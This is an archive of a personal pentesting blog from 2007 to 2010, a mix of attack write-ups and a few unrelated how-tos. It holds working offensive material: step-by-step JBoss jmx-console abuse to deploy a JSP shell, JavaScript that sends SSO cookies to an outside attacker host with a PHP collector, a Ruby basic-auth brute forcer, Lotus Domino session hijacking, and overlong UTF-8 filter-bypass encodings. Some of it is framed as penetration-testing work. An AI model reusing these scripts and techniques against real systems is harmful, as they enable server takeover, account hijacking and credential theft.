Inner Knowledge

The curious case of JBoss Hacking

2010-06-25T18:13:00.005+02:00

Hi everyone.

Today I'd like to talk about the Hacking of Jboss.

There are lots of resources on the net about it but maybe reading this article will hopefully help you when you come to a dead end because the configuration is not so standard.

The prerequisite is that you have access to the jmx-console as admin.
It is not so rare seeing jboss where the jmx-console is not password protected.

Well now what...

You would like to shovel your nice shell by using the addURL() function in the DeploymentScanner, but suddenly you think wtf ....the victim machine cannot connect to my web server on any port (no reverse, only bind allowed)

There is a workaround as described in this very detailed and nice paper:

http://www.redteam-pentesting.de/publications/jboss (Read it before going further on)

The technique described is about using another jboss class called: DeploymentFileRepository
at:

http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository

and its very useful store() function.
but sometimes thing go wrong anyway when you realize that after posting your jsp code, it doesn't get deployed by Jboss.
This is due to the fact that path where your, say shell.war, dir resides is not in the list of the deploymentscanner url and so the hot deployment fails
The solution is to verify where is your directory by inducing the server to an error:

Function description:

void store()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)

Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 = (jsp code)
p5 = true

Error inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true

Next check the following line:

java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)

The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war is residing.
Now that we know it, we have only to use the addURL() function of the deploymentscanner class.

So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

Function description:

void addURL()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)

The url to input in the form relative to addURL() function is:
file:/prd/jboss/bws/web/bws106/deploy/management/

Note the trailing slash.

Now call your shell by loading the following url:

http://host:8080/shell/shell.jsp

Bye for now...

Ruby SOAP client with basic authentication and client certificate

2010-02-09T18:34:00.013+01:00

During these days I had the need to do a pentest to a web service but since wsfuzzer wasn't working correctly I had to write my own ruby soap client that was able to connect to a ssl protected web service with client certificate and basic authentication.
After many hours spent looking for the suitable library, I've decided to use savon with ruby 1.8.7 (DON'T USE RUBY 1.9.1, it won't work).
First I had to convert 1 p12 certificate into 2 pem:

openssl pkcs12 -in global.p12 -out global.pem

Then we cut the private key part from global pem and copy it into protected_key.pem
and issue the command:
(you gotta provide the password of your private key)

mv global.pem cert.pem

openssl rsa -in protected_key.pem -out key.pem

The we can finally write the ruby code:

require 'rubygems'

require 'savon'

client = Savon::Client.new "https://example.com/services?wsdl" client.request.http.ssl_client_auth(

:cert = OpenSSL::X509::Certificate.new(File.read("cert.pem")),
:key = OpenSSL::PKey::RSA.new(File.read("key.pem")),

:verify_mode => OpenSSL::SSL::VERIFY_NONE )

#BASIC AUTHENTICATION

client.request.basic_auth "User", "Password"

puts client.wsdl.soap_actions

#puts client.wsdl.namespace_uri

#don't forget @inorder otherwise the client will send you key values in a different sequence different from #the one you wrote down

response = client.add_customer do |soap|

soap.body = {

:id =111,

:tel =1233,

:issuer =asder,

:payment_mode =1,

:alias =asd,

:@inorder = [:id, :tel, :issuer, :payment_mode, :alias] }

end

puts response.to_xml

Finally you have to add some permutation to your values to make it a real soap fuzzer. You can start by getting the file all_attacks.txt used by from WSFuzzer

How to steal cross domain cookies via double XSS

2010-01-25T12:37:00.005+01:00

During a pentest to a big company using SSO (single-sign-on) system I found a stored xss in one of their site, call it "a.com". This site unfortunately doesn't partecipate in the SSO login system, so I had to devise a way to use it to steal the cookies from one of the SSO domains. After some tests I found that "b.com" (one of the SSO domains) was vulnerable to reflected xss, so by injecting an iframe in a.com that as a source was calling the vulnerable "b.com" url that in turn was loading an image that as a source was calling my server I managed to steal sso authenticated cookies. Let's see some code: (the code is taking advantage of jquery.js since it was originally loaded by a.com) The following code is an external js injected in the stored xss vulnerable parameter in "a.com"


$(document).ready(function() {
var el = document.createElement("iframe");
el.setAttribute('id', 'ifrm');
el.setAttribute('heigth', '0');
el.setAttribute('width', '0');
el.style.visibility="hidden";
document.body.appendChild(el);
url="http://www.b.com/index.php?query=%22%3CSCRIPT/SRC=http://myevilsite.com/Cookie_Stealer/ex.js?";
el.setAttribute('src', url);

});

where ex.js is:


var Image = document.createElement("img");
Image.setAttribute("width","30");
Image.src="http://myevilsite.com/Cookie_Stealer/stealer.php?c="+encodeURI(document.cookie)+"&location="+document.location;

and stealer.php code is:


<?php
$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a")
or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
?>

Finally by visiting a.com while being logged to any of the SSO domains causes your credentials being sent to my server

Using REXML for parsing XSS Cheat Sheet

2009-10-21T17:59:00.005+02:00

A small ruby snippets for parsing Xss cheat sheet at http://ha.ckers.org/xssAttacks.xml



#Coded by cl@rity533k@
#!/usr/bin/ruby
require 'rexml/document'
include REXML
if ARGV.length < 1 
     $stderr.puts("Usage: #{File.basename($0)} ")
exit
end

if File.file?("#{ARGV[0]}") == false then
$stderr.puts("ERROR: xml file not found: #{ARGV[0]}.")
exit
end

file = File.new("#{ARGV[0]}")
Prod_array = Array.new
doc = Document.new(file)
root = doc.root


for prt in root.elements.to_a("//attack/code")
p prt.text 
end

0-day ActiveX on Radiology Software

2009-07-14T11:31:00.013+02:00

Hi everyone again!!
I'd like to report an undisclosed vulnerability I found in a very commonly used Radiology Software during a pentest in a Hospital.

Technical details:

To work propery the application installs a cab file called prjkillhome.cab containing our ActiveX control.
Using ComRaider we can see that this control uses a potentially noxious function called OpenShell.

By creating an html document that invokes it it's been possible to exploit it to run arbitrary code on the victim machine.
Following is a PoC that spawn calc.exe

Ruby Brute Forcer for Basic Authentication

2009-07-03T17:13:00.011+02:00

Hi everyone since I've just started my coding in ruby, I'd like to give the Hacking community a small contribution. Here's a ruby script that given two files it attempts to brute force basic authentication login, like those of lotus notes or apache.


#!/bin/ruby
require 'net/http'
require 'timeout'

print ("

Basic Auth Bruteforcer
----------------------------
Usage: #{File.basename($0)} url uri 


")
if ARGV.length < 2
    $stderr.puts("Usage: #{File.basename($0)}  ")
    exit
end

url = "#{ARGV[0]}"
p url
uri = "#{ARGV[1]}"
p uri
username = IO.readlines("user.txt")
password = IO.readlines("password.txt")
resp = href = "";
begin
http = Net::HTTP.new(url, 80)
   #http.use_ssl = true
 username.each do |user|
  password.each do |pass|
  p "trying  #{user.chomp} with password #{pass.chomp}"
   Timeout::timeout(3) do
   http.start do |http|
   req = Net::HTTP::Get.new(uri, {"User-Agent" => "wget"})
   req.basic_auth(user.chomp, pass.chomp)
   response = http.request(req)
    case response
     when Net::HTTPOK
      p resp = response.body
     when Net::HTTPUnauthorized
      p 'Unauthorized'
     else 
      p 'error'
    end
   end
   end
  end
 end
 rescue
  $stderr.print "Connection Failed: " + $! + "\n"
 rescue Timeout::Error
  p "Problem Connecting"

end

Overly long UTF-8 encoding explained by a non byte eater

2009-06-10T12:47:00.007+02:00

Hello everyone, after reading the recent unicode attack vs SiteMinder, I've decided to write a dumb proof explanation of how the overly long UTF-8 encoding works since I couldn't find a good one. To do this we need to know the rules for representing a valid utf-8 octet sequence, a table to help us find the ASCII equivalent char and some binary notions.

The rules can be found at: http://www.ietf.org/rfc/rfc2279.txt?number=2279 (1)
The table can be found at: http://www.utf8-chartable.de/unicode-utf8-table.pl (2)

From (1)

UTF-8 definition

In UTF-8, characters are encoded using sequences of 1 to 6 octets.
The only octet of a "sequence" of one has the higher-order bit set to
0, the remaining 7 bits being used to encode the character value. In
a sequence of n octets, n>1, the initial octet has the n higher-order
bits set to 1, followed by a bit set to 0.  The remaining bit(s) of
that octet contain bits from the value of the character to be
encoded.  The following octet(s) all have the higher-order bit set to
1 and the following bit set to 0, leaving 6 bits in each to contain
bits from the character to be encoded.

The table below summarizes the format of these different octet types.
The letter x indicates bits available for encoding bits of the UCS-4
character value.



Yergeau                     Standards Track                     [Page 3]

RFC 2279                         UTF-8                      January 1998

UCS-4 range (hex.)        UTF-8 octet sequence (binary)
0000 0000-0000 007F       0xxxxxxx
0000 0080-0000 07FF       110xxxxx 10xxxxxx
0000 0800-0000 FFFF       1110xxxx 10xxxxxx 10xxxxxx
0001 0000-001F FFFF       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
0020 0000-03FF FFFF       111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
0400 0000-7FFF FFFF       1111110x 10xxxxxx ... 10xxxxxx

Encoding from UCS-4 to UTF-8 proceeds as follows:

1) Determine the number of octets required from the character value
and the first column of the table above.  It is important to note
that the rows of the table are mutually exclusive, i.e. there is
only one valid way to encode a given UCS-4 character.

2) Prepare the high-order bits of the octets as per the second column
of the table.

3) Fill in the bits marked x from the bits of the character value,
starting from the lower-order bits of the character value and
putting them first in the last octet of the sequence, then the
next to last, etc. until all x bits are filled in.

The algorithm for encoding UCS-2 (or Unicode) to UTF-8 can be
obtained from the above, in principle, by simply extending each
UCS-2 character with two zero-valued octets.  However, pairs of
UCS-2 values between D800 and DFFF (surrogate pairs in Unicode
parlance), being actually UCS-4 characters transformed through
UTF-16, need special treatment: the UTF-16 transformation must be
undone, yielding a UCS-4 character that is then transformed as
above.

Let's now explain how to create different UTF-8 representations of the same char following the afore mentioned rules. Let's take for example the "<" (less than sign.). If we look at the table (2) we'll see that the HEX encoding for "<" is:

ASCII	HEX	BINARY
<	%3C	00111100

If we look at the binary representation we can see that is perfectly valid as it follows the pattern: 0xxxxxxx but what if we would like to use two octets (overly long representation) to encode 00111100 (our less than sign)? To do so let's split it in 2 chunks of 6 and 2 elements: 00 111100 and let's start by substituting the x's with our two chunks, from low order to high order bits ( right to left ) and padding the remaining bits with 0's.

	1st octet	2nd octet
	110xxxxx	10xxxxxx
BINARY	11000000	10111100
HEX	%C0	%BC

Now analogously if we want to use a three octects encoding we have:

	1st octet	2nd octet	3rd octet
	1110xxxx	10xxxxxx	10xxxxxx
BINARY	11100000	10000000	10111100
HEX	%E0	%80	%BC

Thanks to these encodings the guy at: http://i8jesus.com/?p=55 managed to bypass SiteMinder filters. A great thank to my colleague daigoro for helping me in understanding this subject better.

Chickenfoot dictionary attack

2007-11-30T17:32:00.000+01:00

Hello everyone... This time we'll learn how to write a very cool script using a superset of javascript functions. This is achieved through a firefox extension called chickenfoot that you can install from here. The script will automate the filling of username and password given two different files. If you receive an error its probably because the script doesn't find the fileio.js file. In this case you can find it on your system , open it and copy the content before my script begins. Credits also go to my friend "Daigoro"

MySql painless deployment on Slackware

2007-11-23T11:30:00.001+01:00

Hello everyone....I've decided to use my blog as a repository of material not strictly related to security so as to post more often and most of all to keep a track of useful configuration. As you can infer from the title we are going through a quick and painless MySql deployment on Slackware (my one and only distro of choice). First of all download MySql package from a slackware repository and install it with: - installpkg MySql-ver.tgz then we need to install the db with: - mysql_install_db change the permission of the mysql library to mysql user - cd /var/lib/;chown -R mysql:mysql mysql finally fire up the mysql daemon - /usr/bin/mysqld_safe & If you want to start the daemon at start-up you gotta issue: - chmod a+x /etc/rc.d/rc.mysqld This concludes the little guide.

Lotus Domino Session Hijacking

2007-08-10T14:36:00.000+02:00

Hi everyone, I've been very busy lately so this is why I haven't posted for so long... By the way, I might have discovered a new vulnerability in Lotus Domino Web Access. Here's what I've found As soon as you successfully authenticate to the Lotus Notes Web Interface, you receive a session token called DomAuthSessId. I've discovered that if you steal this token from a logged user, and set it in your browser then you can impersonate the victim. Obviously Lotus Notes allow the same user to authenticate concurrently from two different IPs. The Lotus Notes version were 5 and 6. To steal the cookie you can use the commom methods, like sniffing, using XSS etc. To view and set the cookie you can use a very nice firefox extension called web developer toolbar. As a side note this article was posted on bugtraq but was refused, the answer was: "Hmm this doesn't seem out of the ordinary for a webmail application -- the trick is stealing the token in the first place" Now...I've tested the same thing on openwebmail and that didn't work, so to me It doesn't look so normal. As for stealing the cookie, we have already talked about it. Credits also go to my collegue Dave Nigro for helping me testing the vulnerability.

My first post

2007-05-21T17:52:00.000+02:00

Hi everyone, I wanna introduce myself to you... I'm a computer enthusiastic (geek), mainly self-taught that works, at the moment, as a paid ethical hacker. English is not my native language so please bear with me if you encounter any errors. As a self-taught person I often found that the real problem is not to find computer related articles on the web, but to find quality articles. For quality I mean articles explained very clearly, but that often implies a very deep knowledge of the subject treated by writer. I think that many people write some useless posts just to show-off, copying and pasting from all around. My aim is to do the opposite, e.g. write about IT or IT Sec. related matters in a way that most of the people can understand. I also invite you to partecipate in with comments that can better the resulting post. Stay tuned more to come soon.